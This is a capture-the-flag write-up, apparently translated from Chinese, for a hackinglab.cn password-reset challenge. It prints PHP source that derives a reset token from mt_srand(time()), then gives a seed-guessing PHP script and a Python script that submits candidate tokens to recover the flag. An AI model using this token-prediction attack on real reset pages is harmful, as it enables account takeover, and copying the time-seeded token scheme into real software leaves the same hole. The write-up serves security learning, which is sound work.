Xiao Ming learning code audit writeup
Off topic from hackinglab.cn comprehensive
topics Address: http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php
Access address topics get the following source:
Please Reset Your Password Then Get your flag!
<a href="./resetpwd.php"></a>
According to replicate access links resetpwd.php, and view the page source code, found the notes have PHP Code:
<?php
session_start();
include '_flag.php';
date_default_timezone_set('Asia/Shanghai');
if(isset($_POST['token']) && isset($_SESSION['token']) &&!empty($_POST['token'])&&!empty($_SESSION['token'])){
if($_POST['token']==$_SESSION['token']){
echo "PassResetSuccess! Your Flag is:".$flag;
}else{
echo "Token_error!";
}
}else{
mt_srand(time());
$rand= mt_rand();
$_SESSION['token']=sha1(md5($rand));
echo "Token Generate Ok! now send email to your EmailBox!.....";
if(sendmymail($_SESSION['token'])){
echo "SendOK! \r\n<br> Your password reset Token has been send to your mailbox! <br>Please Check your mail box and fill your token here to reset your password!<br>";
};
}
echo '<form action="" method="POST">
<input type="text" name="token">
<input type="submit" value="submit">
</form>';
echo "<!--\r\n".file_get_contents(__FILE__);
?>
Source analysis shows that only the correct token to get the flag. If you do not submit token, direct request resetpwd.php page, token will be reset. If you submit a token, token will not change.
Code generation token embodiment described, using a random manner
mt_srand(time());
$rand= mt_rand();
$_SESSION['token']=sha1(md5($rand));
According to the rules of random number generation, the same long mt_srand () parameter, the generated random number is actually fixed. So we can write exp:
Auxiliary scripts
$base = time();
//设定一个时间区间,来确保可以碰撞到正确的时间
for($i = -5;$i <= 5;$i++)
{
mt_srand($base+$i);
$rand = mt_rand();
echo sha1(md5($rand))."<br/>";
}
EXP
import requests
r = requests.get('http://localhost/ttt.php')
rlt = r.text.split('<br/>')
rlt = rlt[:-1]
data = {}
header = {"Cookie":"PHPSESSID=294a9b966570ae34347a613e894d3271","Referer":"http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php"}
url = 'http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/resetpwd.php'
#重置token
r = requests.get(url,headers=header)
for i in rlt:
data["token"] = i
r = requests.post(url,data=data,headers=header)
r.encoding = r.apparent_encoding
if "Token_error!" not in r.text[:60]:
print(r.text[:60])
Get flag
PassResetSuccess! Your Flag is:NotSecurityRandomNowYouKnown<